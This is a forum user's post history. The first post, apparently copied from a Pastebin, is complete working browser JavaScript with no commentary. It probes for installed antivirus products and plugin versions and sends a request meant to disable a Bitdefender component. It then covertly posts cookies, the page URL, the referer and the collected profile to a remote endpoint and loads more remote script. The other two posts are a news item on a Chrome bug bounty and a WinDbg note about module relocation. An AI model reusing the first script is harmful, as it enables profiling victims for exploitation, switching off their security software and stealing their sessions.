

Everything posted by Nytro

  1. window.justforfunnum = 25; var justforfunpath=new Array("<?php return;?>==","avira==\\\\127.0.0.1\\c$\\Program Files\\Avira\\AntiVir Desktop\\avsda.dll","avira==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\avipbb.sys","bitdefender_2013==\\\\127.0.0.1\\c$\\Program Files\\Bitdefender\\Bitdefender 2013 BETA\\BdProvider.dll","bitdefender_2013==\\\\127.0.0.1\\c$\\Program Files\\Bitdefender\\Bitdefender 2013 BETA\\Active Virus Control\\avc3_000_001\\avcuf32.dll","mcafee_enterprise==\\\\127.0.0.1\\c$\\Program Files\\McAfee\\VirusScan Enterprise\\RES0402\\McShield.dll","mcafee_enterprise==\\\\127.0.0.1\\c$\\Program Files\\Common Files\\McAfee\\SystemCore\\mytilus3.dll","mcafee_enterprise==\\\\127.0.0.1\\c$\\Program Files\\Common Files\\McAfee\\SystemCore\\mytilus3_worker.dll","avg2012==\\\\127.0.0.1\\c$\\Program Files\\AVG Secure Search\\13.2.0.4\\AVG Secure Search_toolbar.dll","avg2012==\\\\127.0.0.1\\c$\\Program Files\\Common Files\\AVG Secure Search\\DNTInstaller\\13.2.0\\avgdttbx.dll","avg2012==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\avgtpx86.sys","eset_nod32==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\eamon.sys","Dr.Web==\\\\127.0.0.1\\c$\\Program Files\\DrWeb\\drwebsp.dll","Mse==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\MpFilter.sys","sophos==\\\\127.0.0.1\\c$\\PROGRA~1\\Sophos\\SOPHOS~1\\SOPHOS~1.DLL","f-secure2011==\\\\127.0.0.1\\c$\\program files\\f-secure\\scanner-interface\\fsgkiapi.dll","f-secure2011==\\\\127.0.0.1\\c$\\Program Files\\F-Secure\\FSPS\\program\\FSLSP.DLL","f-secure2011==\\\\127.0.0.1\\c$\\program files\\f-secure\\hips\\fshook32.dll","Kaspersky_2012==\\\\127.0.0.1\\c$\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\klwtblc.dll","Kaspersky_2012==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\klif.sys","Kaspersky_2013==\\\\127.0.0.1\\c$\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\remote_eka_prague_loader.dll","Kaspersky_2013==\\\\127.0.0.1\\c$\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 
2013\\klwtblc.dll","Kaspersky_2013==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\kneps.sys","Kaspersky_2013==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\klflt.sys",''); window.justforfunres = new Array(); function execjs(url) { var jsme = document.createElement('script'); var page = document.getElementsByTagName('head').item(0); jsme.src = url+'?'+Math.random(); page.appendChild(jsme); } function include(formaction,vul) { var ref = document.referrer; var urlx = location.href; var temp="Url:"+urlx+"xxooxxooReferer:"+ref+"xxooxxooCookies:"+escape(document.cookie); if (document.all) { iframe_tag = document.createElement("<iframe name=postformdata style=display:none>"); document.getElementsByTagName('head')[0].appendChild(iframe_tag); var form_tag = document.createElement("form"); form_tag.target="postformdata"; form_tag.method="POST"; form_tag.action = formaction; document.getElementsByTagName('head')[0].appendChild(form_tag); var i = document.createElement("input"); i.type = "hidden"; i.value = temp; i.name = "ck"; var j = document.createElement("input"); j.type = "hidden"; j.value = vul; j.name = "vul"; form_tag.appendChild(i); form_tag.appendChild(j); form_tag.submit(); } else { iframe_tag = document.createElement('iframe'); iframe_tag.setAttribute("name", "postformdata"); iframe_tag.setAttribute("width", "0"); iframe_tag.setAttribute("height", "0"); document.getElementsByTagName('head')[0].appendChild(iframe_tag); var form_tag = document.createElement("form"); form_tag.setAttribute("target", "postformdata"); form_tag.setAttribute("action" ,formaction); form_tag.setAttribute("method" ,"POST"); document.getElementsByTagName('head')[0].appendChild(form_tag); var i = document.createElement("input"); i.setAttribute("type","hidden"); i.setAttribute("value",temp); i.setAttribute("name","ck"); var j = document.createElement("input"); j.setAttribute("type","hidden"); j.setAttribute("value",vul); j.setAttribute("name","vul"); form_tag.appendChild(i); 
form_tag.appendChild(j); form_tag.submit(); } } window.onerror = function() { var arr = new Array(); for(var i = 0; i < window.justforfunnum; i ++) { try { arr.push(document.getElementById('v'+i).vul); } catch (e) { } } window.justforfunres.push(arr); return true; } function jstocreate(){ for(i=0;i<justforfunpath.length-1;i++){ var temp=justforfunpath[i].split('=='); var h=document.createElement('script'); h.id='v'+(i); h.vul=(i); h.name=temp[0]; h.src=temp[1]; document.getElementsByTagName('head')[0].appendChild(h); } } function officever() { var ma=1;var mb=1;var mc=1;var md=1;try{ma=new ActiveXObject("SharePoint.OpenDocuments.4")}catch(e){}try{mb=new ActiveXObject("SharePoint.OpenDocuments.3")}catch(e){}try{mc=new ActiveXObject("SharePoint.OpenDocuments.2")}catch(e){}try{md=new ActiveXObject("SharePoint.OpenDocuments.1")}catch(e){}var a=typeof ma;var b=typeof mb;var c=typeof mc;var d=typeof md;var key="";if(a=="object"&&b=="object"&&c=="object"&&d=="object"){key="Office 2010"}if(a=="number"&&b=="object"&&c=="object"&&d=="object"){key="Office 2007"}if(a=="number"&&b=="number"&&c=="object"&&d=="object"){key="Office 2003"}if(a=="number"&&b=="number"&&c=="number"&&d=="object"){key="Office Xp"}return key } function plugin_pdf_ie() { //ie var ma=1; var key=""; try{ma=new ActiveXObject("AcroPDF.PDF");}catch(e){}; var a=typeof ma; if(a=="object"){key="Adobe Reader";} return key; } function flashver() { var flash=function(){};flash.prototype.controlVersion=function(){var version;var axo;var e;try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");version=axo.GetVariable("$version")}catch(e){}if(!version){try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");version="WIN 6,0,21,0";axo.AllowScriptAccess="always";version=axo.GetVariable("$version")}catch(e){}}if(!version){try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");version=axo.GetVariable("$version")}catch(e){}}if(!version){try{axo=new 
ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");version="WIN 3,0,18,0"}catch(e){}}if(!version){try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");version="WIN 2,0,0,11"}catch(e){version=-1}}var verArr=version.toString().split(",");var str="";for(var i=0,l=verArr.length;i<l;i++){if(verArr[i].indexOf("WIN")!=-1){str+=verArr[i].substring(3);str+="."}else{if(i==(l-1)){str+=verArr[i]}else{str+=verArr[i];str+="."}}}return(str)};flash.prototype.getSwfVer=function(){var isIE=(navigator.appVersion.indexOf("MSIE")!=-1)?true:false;var isWin=(navigator.appVersion.toLowerCase().indexOf("win")!=-1)?true:false;var isOpera=(navigator.userAgent.indexOf("Opera")!=-1)?true:false;var flashVer=-1;if(navigator.plugins!=null&&navigator.plugins.length>0){if(navigator.plugins["Shockwave Flash 2.0"]||navigator.plugins["Shockwave Flash"]){var swVer2=navigator.plugins["Shockwave Flash 2.0"]?" 2.0":"";var flashDescription=navigator.plugins["Shockwave Flash"+swVer2].description;var descArray=flashDescription.split(" ");var tempArrayMajor=descArray[2].split(".");var versionMajor=tempArrayMajor[0];var versionMinor=tempArrayMajor[1];var versionRevision=descArray[3];if(versionRevision==""){versionRevision=descArray[4]}if(versionRevision[0]=="d"){versionRevision=versionRevision.substring(1)}else{if(versionRevision[0]=="r"){versionRevision=versionRevision.substring(1);if(versionRevision.indexOf("d")>0){versionRevision=versionRevision.substring(0,versionRevision.indexOf("d"))}}}var flashVer=versionMajor+"."+versionMinor+"."+versionRevision}}else{if(navigator.userAgent.toLowerCase().indexOf("webtv/2.6")!=-1){flashVer=4}else{if(navigator.userAgent.toLowerCase().indexOf("webtv/2.5")!=-1){flashVer=3}else{if(navigator.userAgent.toLowerCase().indexOf("webtv")!=-1){flashVer=2}else{if(isIE&&isWin&&!isOpera){flashVer=new flash().controlVersion()}}}}}return flashVer};if(flash.prototype.getSwfVer()==-1){return"No Flash!"}else{return"Shockwave Flash "+flash.prototype.getSwfVer()} } function ajaxfun() { 
var XMLhttpObject=null;if(window.XMLHttpRequest){XMLhttpObject=new XMLHttpRequest()}else{var MSXML=["Msxml2.XMLHTTP.7.0","Msxml2.XMLHTTP.6.0","Msxml2.XMLHTTP.5.0","Msxml2.XMLHTTP.4.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","MSXML.XMLHTTP","MICROSOFT.XMLHTTP.1.0","MICROSOFT.XMLHTTP.1","Microsoft.XMLHTTP"];for(var i=0;i<MSXML.length;i++){try{XMLhttpObject=new ActiveXObject(MSXML[i]);break}catch(ex){}}}return XMLhttpObject } function disabledbitdefender_2012() { try{var src=document.body.firstChild.src;var ajax=ajaxfun();ajax.onreadystatechange=function(){if(ajax.readyState==4&&ajax.status==200){var temp=ajax.responseText;var a=temp.indexOf("this.ajax.setRequestHeader(");var b=temp.indexOf("this.ajax.send(params);");var head=temp.substring(a,;head=head.split("this.ajax.setRequestHeader(");head=head[2];head=head.replace(/\)/g,"");head=head.replace(/;/g,"");head=head.replace(/\"/g,"");head=head.replace(/ /g,"");head=head.replace(/\r\n/gi,"");head=head.split(",");var name=head[0].toString();var age=head[1].toString();var newajax=ajaxfun();newajax.open("POST",window.location+Math.random(),false);newajax.setRequestHeader("Content-type","application/x-www-form-urlencoded");newajax.setRequestHeader(name,age);var params="status=%3Cmodule%20uid%3D%22NetDefender.HTTP.Core%22%3E%3Cplugin%20uid%3D%22NetDefender.HTTP.Core%22%20feature%3D%22NetDefender.Feature.HTTP.Core.Status%22%20user%3D%22%22%20pid%3D%22%25PID%25%22%20status%3D%220%22%20%2F%3E%3C%2Fmodule%3E";newajax.send(params)}};ajax.open("GET",src,true);ajax.send()}catch(e){} } function bitdefender2012check() { try{var temp=document.body.innerHTML;var key="netdefender/hui/ndhui.js";if(temp.indexOf(key)>0){disabledbitdefender_2012();return"bitdefender_2012"}else{return""}}catch(e){return""} } function unique(data){ data = data || []; var a = {}; for (var i=0; i<data.length; i++) { var v = data[i]; if (typeof(a[v]) == 'undefined'){ a[v] = 1; } }; data.length=0; for (var i in a){ data[data.length] = i; } return data; } function 
java() { var deployJava=function(){var l={core:["id","class","title","style"],i18n:["lang","dir"],events:["onclick","ondblclick","onmousedown","onmouseup","onmouseover","onmousemove","onmouseout","onkeypress","onkeydown","onkeyup"],applet:["codebase","code","name","archive","object","width","height","alt","align","hspace","vspace"],object:["classid","codebase","codetype","data","type","archive","declare","standby","height","width","usemap","name","tabindex","align","border","hspace","vspace"]};var b=l.object.concat(l.core,l.i18n,l.events);var m=l.applet.concat(l.core);function g(n){if(!d.debug){return}if(console.log){console.log(n)}else{alert(n)}}function k(o,n){if(o==null||o.length==0){return true}var q=o.charAt(o.length-1);if(q!="+"&&q!="*"&&(o.indexOf("_")!=-1&&q!="_")){o=o+"*";q="*"}o=o.substring(0,o.length-1);if(o.length>0){var p=o.charAt(o.length-1);if(p=="."||p=="_"){o=o.substring(0,o.length-1)}}if(q=="*"){return(n.indexOf(o)==0)}else{if(q=="+"){return o<=n}}return false}function e(){var n="//java.com/js/webstart.png";try{return document.location.protocol.indexOf("http")!=-1?n:"http:"+n}catch(o){return"http:"+n}}function j(p,o){var n=p.length;for(var q=0;q<n;q++){if(p[q]===o){return true}}return false}function c(n){return j(m,n.toLowerCase())}function i(n){return j(b,n.toLowerCase())}function a(n){if("MSIE"!=deployJava.browserName){return true}if(deployJava.compareVersionToPattern(deployJava.getPlugin().version,["10","0","0"],false,true)){return true}if(n==null){return false}return !k("1.6.0_33+",n)}var 
d={debug:null,version:"20120801",firefoxJavaVersion:null,myInterval:null,preInstallJREList:null,returnPage:null,brand:null,locale:null,installType:null,EAInstallEnabled:false,EarlyAccessURL:null,getJavaURL:"http://jdl.sun.com/webapps/getjava/BrowserRedirect?host=java.com",oldMimeType:"application/npruntime-scriptable-plugin;DeploymentToolkit",mimeType:"application/java-deployment-toolkit",launchButtonPNG:e(),browserName:null,browserName2:null,getJREs:function(){var r=new Array();if(this.isPluginInstalled()){var q=this.getPlugin();var n=q.jvms;for(var p=0;p<n.getLength();p++){r[p]=n.get(p).version}}else{var o=this.getBrowser();if(o=="MSIE"){if(this.testUsingActiveX("1.7.0")){r[0]="1.7.0"}else{if(this.testUsingActiveX("1.6.0")){r[0]="1.6.0"}else{if(this.testUsingActiveX("1.5.0")){r[0]="1.5.0"}else{if(this.testUsingActiveX("1.4.2")){r[0]="1.4.2"}else{if(this.testForMSVM()){r[0]="1.1"}}}}}}else{if(o=="Netscape Family"){this.getJPIVersionUsingMimeType();if(this.firefoxJavaVersion!=null){r[0]=this.firefoxJavaVersion}else{if(this.testUsingMimeTypes("1.7")){r[0]="1.7.0"}else{if(this.testUsingMimeTypes("1.6")){r[0]="1.6.0"}else{if(this.testUsingMimeTypes("1.5")){r[0]="1.5.0"}else{if(this.testUsingMimeTypes("1.4.2")){r[0]="1.4.2"}else{if(this.browserName2=="Safari"){if(this.testUsingPluginsArray("1.7.0")){r[0]="1.7.0"}else{if(this.testUsingPluginsArray("1.6")){r[0]="1.6.0"}else{if(this.testUsingPluginsArray("1.5")){r[0]="1.5.0"}else{if(this.testUsingPluginsArray("1.4.2")){r[0]="1.4.2"}}}}}}}}}}}}}if(this.debug){for(var p=0;p<r.length;++p){g("[getJREs()] We claim to have detected Java SE "+r[p])}}return r},installJRE:function(q,o){var n=false;if(this.isPluginInstalled()&&this.isAutoInstallEnabled(q)){var p=false;if(this.isCallbackSupported()){p=this.getPlugin().installJRE(q,o)}else{p=this.getPlugin().installJRE(q)}if(p){this.refresh();if(this.returnPage!=null){document.location=this.returnPage}}return p}else{return 
this.installLatestJRE()}},isAutoInstallEnabled:function(n){if(!this.isPluginInstalled()){return false}if(typeof n=="undefined"){n=null}return a(n)},isCallbackSupported:function(){return this.isPluginInstalled()&&this.compareVersionToPattern(this.getPlugin().version,["10","2","0"],false,true)},installLatestJRE:function(p){if(this.isPluginInstalled()&&this.isAutoInstallEnabled()){var q=false;if(this.isCallbackSupported()){q=this.getPlugin().installLatestJRE(p)}else{q=this.getPlugin().installLatestJRE()}if(q){this.refresh();if(this.returnPage!=null){document.location=this.returnPage}}return q}else{var o=this.getBrowser();var n=navigator.platform.toLowerCase();if((this.EAInstallEnabled=="true")&&(n.indexOf("win")!=-1)&&(this.EarlyAccessURL!=null)){this.preInstallJREList=this.getJREs();if(this.returnPage!=null){this.myInterval=setInterval("deployJava.poll()",3000)}location.href=this.EarlyAccessURL;return false}else{if(o=="MSIE"){return this.IEInstall()}else{if((o=="Netscape Family")&&(n.indexOf("win32")!=-1)){return this.FFInstall()}else{location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"")}}return false}}},runApplet:function(o,t,q){if(q=="undefined"||q==null){q="1.1"}var r="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var n=q.match(r);if(this.returnPage==null){this.returnPage=document.location}if(n!=null){var p=this.getBrowser();if(p!="?"){if(this.versionCheck(q+"+")){this.writeAppletTag(o,t)}else{if(this.installJRE(q+"+")){this.refresh();location.href=document.location;this.writeAppletTag(o,t)}}}else{this.writeAppletTag(o,t)}}else{g("[runApplet()] Invalid minimumVersion argument to runApplet():"+q)}},writeAppletTag:function(q,v){var n="<applet ";var p="";var r="</applet>";var w=true;if(null==v||typeof v!="object"){v=new Object()}for(var o in q){if(!c(o)){v[o]=q[o]}else{n+=(" "+o+'="'+q[o]+'"');if(o=="code"){w=false}}}var 
u=false;for(var t in v){if(t=="codebase_lookup"){u=true}if(t=="object"||t=="java_object"||t=="java_code"){w=false}p+='<param name="'+t+'" value="'+v[t]+'"/>'}if(!u){p+='<param name="codebase_lookup" value="false"/>'}if(w){n+=(' code="dummy"')}n+=">";document.write(n+"\n"+p+"\n"+r)},versionCheck:function(o){var u=0;var w="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?(\\*|\\+)?$";var x=o.match(w);if(x!=null){var q=false;var t=false;var p=new Array();for(var r=1;r<x.length;++r){if((typeof x[r]=="string")&&(x[r]!="")){p[u]=x[r];u++}}if(p[p.length-1]=="+"){t=true;q=false;p.length--}else{if(p[p.length-1]=="*"){t=false;q=true;p.length--}else{if(p.length<4){t=false;q=true}}}var v=this.getJREs();for(var r=0;r<v.length;++r){if(this.compareVersionToPattern(v[r],p,q,t)){return true}}return false}else{var n="Invalid versionPattern passed to versionCheck: "+o;g("[versionCheck()] "+n);alert(n);return false}},isWebStartInstalled:function(q){var p=this.getBrowser();if(p=="?"){return true}if(q=="undefined"||q==null){q="1.4.2"}var o=false;var r="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var n=q.match(r);if(n!=null){o=this.versionCheck(q+"+")}else{g("[isWebStartInstaller()] Invalid minimumVersion argument to isWebStartInstalled(): "+q);o=this.versionCheck("1.4.2+")}return o},getJPIVersionUsingMimeType:function(){for(var o=0;o<navigator.mimeTypes.length;++o){var p=navigator.mimeTypes[o].type;var n=p.match(/^application\/x-java-applet;jpi-version=(.*)$/);if(n!=null){this.firefoxJavaVersion=n[1];if("Opera"!=this.browserName2){break}}}},launchWebStartApplication:function(q){var n=navigator.userAgent.toLowerCase();this.getJPIVersionUsingMimeType();if(this.isWebStartInstalled("1.7.0")==false){if((this.installJRE("1.7.0+")==false)||((this.isWebStartInstalled("1.7.0")==false))){return false}}var t=null;if(document.documentURI){t=document.documentURI}if(t==null){t=document.URL}var o=this.getBrowser();var p;if(o=="MSIE"){p='<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" 
width="0" height="0"><PARAM name="launchjnlp" value="'+q+'"><PARAM name="docbase" value="'+t+'"></object>'}else{if(o=="Netscape Family"){p='<embed type="application/x-java-applet;jpi-version='+this.firefoxJavaVersion+'" width="0" height="0" launchjnlp="'+q+'"docbase="'+t+'" />'}}if(document.body=="undefined"||document.body==null){document.write(p);document.location=t}else{var r=document.createElement("div");r.id="div1";r.style.position="relative";r.style.left="-10000px";r.style.margin="0px auto";r.className="dynamicDiv";r.innerHTML=p;document.body.appendChild(r)}},createWebStartLaunchButtonEx:function(p,o){if(this.returnPage==null){this.returnPage=p}var n="javascript:deployJava.launchWebStartApplication('"+p+"');";document.write('<a href="'+n+'" onMouseOver="window.status=\'\'; return true;"><img src="'+this.launchButtonPNG+'" border="0" /></a>')},createWebStartLaunchButton:function(p,o){if(this.returnPage==null){this.returnPage=p}var n="javascript:if (!deployJava.isWebStartInstalled(""+o+"")) {if (deployJava.installLatestJRE()) {if (deployJava.launch(""+p+"")) {}}} else {if (deployJava.launch(""+p+"")) {}}";document.write('<a href="'+n+'" onMouseOver="window.status=\'\'; return true;"><img src="'+this.launchButtonPNG+'" border="0" /></a>')},launch:function(n){document.location=n;return true},isPluginInstalled:function(){var n=this.getPlugin();if(n&&n.jvms){return true}else{return false}},isAutoUpdateEnabled:function(){if(this.isPluginInstalled()){return this.getPlugin().isAutoUpdateEnabled()}return false},setAutoUpdateEnabled:function(){if(this.isPluginInstalled()){return this.getPlugin().setAutoUpdateEnabled()}return false},setInstallerType:function(n){this.installType=n;if(this.isPluginInstalled()){return this.getPlugin().setInstallerType(n)}return false},setAdditionalPackages:function(n){if(this.isPluginInstalled()){return this.getPlugin().setAdditionalPackages(n)}return 
false},setEarlyAccess:function(n){this.EAInstallEnabled=n},isPlugin2:function(){if(this.isPluginInstalled()){if(this.versionCheck("1.6.0_10+")){try{return this.getPlugin().isPlugin2()}catch(n){}}}return false},allowPlugin:function(){this.getBrowser();var n=("Safari"!=this.browserName2&&"Opera"!=this.browserName2);return n},getPlugin:function(){this.refresh();var n=null;if(this.allowPlugin()){n=document.getElementById("deployJavaPlugin")}return n},compareVersionToPattern:function(u,o,q,r){if(u==undefined||o==undefined){return false}var v="^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";var w=u.match(v);if(w!=null){var t=0;var x=new Array();for(var p=1;p<w.length;++p){if((typeof w[p]=="string")&&(w[p]!="")){x[t]=w[p];t++}}var n=Math.min(x.length,o.length);if(r){for(var p=0;p<n;++p){if(x[p]<o[p]){return false}else{if(x[p]>o[p]){return true}}}return true}else{for(var p=0;p<n;++p){if(x[p]!=o[p]){return false}}if(q){return true}else{return(x.length==o.length)}}}else{return false}},getBrowser:function(){if(this.browserName==null){var n=navigator.userAgent.toLowerCase();g("[getBrowser()] navigator.userAgent.toLowerCase() -> "+n);if((n.indexOf("msie")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="MSIE";this.browserName2="MSIE"}else{if(n.indexOf("iphone")!=-1){this.browserName="Netscape Family";this.browserName2="iPhone"}else{if((n.indexOf("firefox")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="Netscape Family";this.browserName2="Firefox"}else{if(n.indexOf("chrome")!=-1){this.browserName="Netscape Family";this.browserName2="Chrome"}else{if(n.indexOf("safari")!=-1){this.browserName="Netscape Family";this.browserName2="Safari"}else{if((n.indexOf("mozilla")!=-1)&&(n.indexOf("opera")==-1)){this.browserName="Netscape Family";this.browserName2="Other"}else{if(n.indexOf("opera")!=-1){this.browserName="Netscape Family";this.browserName2="Opera"}else{this.browserName="?";this.browserName2="unknown"}}}}}}}g("[getBrowser()] Detected browser name:"+this.browserName+", 
"+this.browserName2)}return this.browserName},testUsingActiveX:function(n){var p="JavaWebStart.isInstalled."+n+".0";if(typeof ActiveXObject=="undefined"||!ActiveXObject){g("[testUsingActiveX()] Browser claims to be IE, but no ActiveXObject object?");return false}try{return(new ActiveXObject(p)!=null)}catch(o){return false}},testForMSVM:function(){var o="{08B0E5C0-4FCB-11CF-AAA5-00401C608500}";if(typeof oClientCaps!="undefined"){var n=oClientCaps.getComponentVersion(o,"ComponentID");if((n=="")||(n=="5,0,5000,0")){return false}else{return true}}else{return false}},testUsingMimeTypes:function(o){if(!navigator.mimeTypes){g("[testUsingMimeTypes()] Browser claims to be Netscape family, but no mimeTypes[] array?");return false}for(var p=0;p<navigator.mimeTypes.length;++p){s=navigator.mimeTypes[p].type;var n=s.match(/^application\/x-java-applet\x3Bversion=(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);if(n!=null){if(this.compareVersions(n[1],o)){return true}}}return false},testUsingPluginsArray:function(o){if((!navigator.plugins)||(!navigator.plugins.length)){return false}var n=navigator.platform.toLowerCase();for(var p=0;p<navigator.plugins.length;++p){s=navigator.plugins[p].description;if(s.search(/^Java Switchable Plug-in (Cocoa)/)!=-1){if(this.compareVersions("1.5.0",o)){return true}}else{if(s.search(/^Java/)!=-1){if(n.indexOf("win")!=-1){if(this.compareVersions("1.5.0",o)||this.compareVersions("1.6.0",o)){return true}}}}}if(this.compareVersions("1.5.0",o)){return true}return false},IEInstall:function(){location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"");return 
false},done:function(o,n){},FFInstall:function(){location.href=this.getJavaURL+((this.returnPage!=null)?("&returnPage="+this.returnPage):"")+((this.locale!=null)?("&locale="+this.locale):"")+((this.brand!=null)?("&brand="+this.brand):"")+((this.installType!=null)?("&type="+this.installType):"");return false},compareVersions:function(q,r){var o=q.split(".");var n=r.split(".");for(var p=0;p<o.length;++p){o[p]=Number(o[p])}for(var p=0;p<n.length;++p){n[p]=Number(n[p])}if(o.length==2){o[2]=0}if(o[0]>n[0]){return true}if(o[0]<n[0]){return false}if(o[1]>n[1]){return true}if(o[1]<n[1]){return false}if(o[2]>n[2]){return true}if(o[2]<n[2]){return false}return true},enableAlerts:function(){this.browserName=null;this.debug=true},poll:function(){this.refresh();var n=this.getJREs();if((this.preInstallJREList.length==0)&&(n.length!=0)){clearInterval(this.myInterval);if(this.returnPage!=null){location.href=this.returnPage}}if((this.preInstallJREList.length!=0)&&(n.length!=0)&&(this.preInstallJREList[0]!=n[0])){clearInterval(this.myInterval);if(this.returnPage!=null){location.href=this.returnPage}}},writePluginTag:function(){var n=this.getBrowser();if(n=="MSIE"){}else{if(n=="Netscape Family"&&this.allowPlugin()){this.writeEmbedTag()}}},refresh:function(){navigator.plugins.refresh(false);var n=this.getBrowser();if(n=="Netscape Family"&&this.allowPlugin()){var o=document.getElementById("deployJavaPlugin");if(o==null){this.writeEmbedTag()}}},writeEmbedTag:function(){var n=false;if(navigator.mimeTypes!=null){for(var o=0;o<navigator.mimeTypes.length;o++){if(navigator.mimeTypes[o].type==this.mimeType){if(navigator.mimeTypes[o].enabledPlugin){document.write('<embed id="deployJavaPlugin" type="'+this.mimeType+'" hidden="true" />');n=true}}}if(!n){for(var o=0;o<navigator.mimeTypes.length;o++){if(navigator.mimeTypes[o].type==this.oldMimeType){if(navigator.mimeTypes[o].enabledPlugin){document.write('<embed id="deployJavaPlugin" type="'+this.oldMimeType+'" hidden="true" 
/>')}}}}}}};d.writePluginTag();if(d.locale==null){var h=null;if(h==null){try{h=navigator.userLanguage}catch(f){}}if(h==null){try{h=navigator.systemLanguage}catch(f){}}if(h==null){try{h=navigator.language}catch(f){}}if(h!=null){h.replace("-","_");d.locale=h}}return d}(); var temp=deployJava.getJREs(); var re=""; if(temp=="") { re="No Java or Disable"; } else { re="Java Version is:"+temp; } return re; } var alldata=new Array(); window.onload = function() { jstocreate(); var retmp = new Array(); for (var i = 0; i < window.justforfunnum; i ++) { var cpr = new Array(); for (var j = 0; j <= i; j ++) { cpr.push(j); } for (var j = 0; j < window.justforfunres.length; j ++) { if (window.justforfunres[j].toString() == cpr.toString()) { retmp.push(i); } } } var sun=retmp; var data=new Array(); for(i=0;i<sun.length;i++){ var temp=document.getElementById('v'+sun[i]).name; data.push(temp); } var kav_2013=0; var kav_2012=0; for(i=0;i<data.length;i++) { if(data[i]=="Kaspersky_2013") { kav_2013=1; } } for(i=0;i<data.length;i++) { if(data[i]=="Kaspersky_2012") { kav_2012=1; } } if(kav_2013==1 &&kav_2012==1) { for(i=0;i<data.length;i++) { if(data[i]=="Kaspersky_2012") { data[i]="Kaspersky_2013"; } } } data=unique(data); alldata.push(flashver()); alldata.push(officever()); alldata.push(plugin_pdf_ie()); alldata.push(bitdefender2012check()); if((typeof java)=="function") { alldata.push(java()); } data=data.join(","); data=data.replace(/,,/g,","); alldata=alldata.join(","); alldata=alldata.replace(/,,/g,","); var put=alldata+","+data; include('[redacted]js.php',put); var tkphp="[redacted]css.js"; execjs(tkphp); } Sursa: test - Pastebin.com
  2. # Google pays record $31K bounty for Chrome bugs
## Rewards European researcher with $31,336 payment for reporting three vulnerabilities in JavaScript 3-D API
By Gregg Keizer, Computerworld - Google this month paid a security researcher $31,336 for reporting a trio of bugs in Chrome. The amount paid to Ralf-Philipp Weinmann, a research associate at the University of Luxembourg's Interdisciplinary Centre for Security, Reliability and Trust, was a record in Google's bug bounty program. Google has paid out more in various contests it has run or co-sponsored, including $100,000 to a two-man team from MWR InfoSecurity at last month's Pwn2Own. Google cited Weinmann's thoroughness in a short message two weeks ago acknowledging his bounty. "We're pleased to reward Ralf-Philipp Weinmann $31,336 under the Chromium Vulnerability Rewards Program for a chain of three bugs, including demo exploit code and very detailed write-up," said Ben Henry, a Google technical program manager, in a blog post. The three-bug chain credited to Weinmann exploited O3D, a JavaScript API (application programming interface) designed for crafting interactive 3-D graphics-based Web applications. The API and supporting browser plug-in were created by Google, with a preliminary version of the latter released in 2009. All three of the vulnerabilities were labeled "High," the second-most-serious ranking in Chrome's four-step scoring system. Weinmann's compensation was markedly more than the norm for Chrome's bounty program. Last August, however, Google announced bigger bounties -- saying the increase had been prompted by a decline in submissions -- and left the door open to a more flexible approach to issuing rewards and bonuses. So far this year, Google has paid nearly $188,000 in bounties and prizes for Chrome and Chrome OS, including those at Pwn2Own and Google's own Pwnium contest, both held in early March at a Vancouver, British Columbia, security conference. 
During Pwnium, a researcher known only as "Pinkie Pie" received $40,000 for a partial exploit of Google's browser-based operating system. Mozilla, developer of Firefox, also pays bug bounties, but unlike Google, does not release the names of researchers or the payments they receive. This article, Google pays record $31K bounty for Chrome bugs, was originally published at Computerworld.com.
  3. ### Windbg Tricks - Module Relocation
When ASLR is not supported, pseudo ASLR is often used to introduce a degree of entropy into where a module is loaded in memory. The basic idea behind pseudo ASLR is to pre-allocate memory at the location of a module's preferred base address. This forces the module to be loaded at an address that is not predetermined. See this for more details. I stumbled across the windbg command !imgreloc the other day. It can be used to show all modules that have been relocated, and what their original preferred base address is. Below is the output when run while attached to firefox.exe (see this ticket about dll blocking and this firefox ticket for a specific history of pseudo ASLR in firefox): 0:017> !imgreloc 00280000 sqlite3 - RELOCATED from 10000000 00300000 js3250 - RELOCATED from 10000000 00400000 firefox - at preferred address 004e0000 nspr4 - RELOCATED from 10000000 00510000 smime3 - RELOCATED from 10000000 00530000 nss3 - RELOCATED from 10000000 005d0000 nssutil3 - RELOCATED from 10000000 005f0000 plc4 - RELOCATED from 10000000 00600000 plds4 - RELOCATED from 10000000 00610000 ssl3 - RELOCATED from 10000000 00640000 xpcom - RELOCATED from 10000000 01220000 browserdirprovider - RELOCATED from 10000000 01540000 brwsrcmp - RELOCATED from 10000000 01de0000 nssdbm3 - RELOCATED from 10000000 02000000 xpsp2res - RELOCATED from 00010000 036a0000 softokn3 - RELOCATED from 10000000 03980000 freebl3 - RELOCATED from 10000000 039d0000 nssckbi - RELOCATED from 10000000 10000000 xul - at preferred address 59a60000 dbghelp - at preferred address 5ad70000 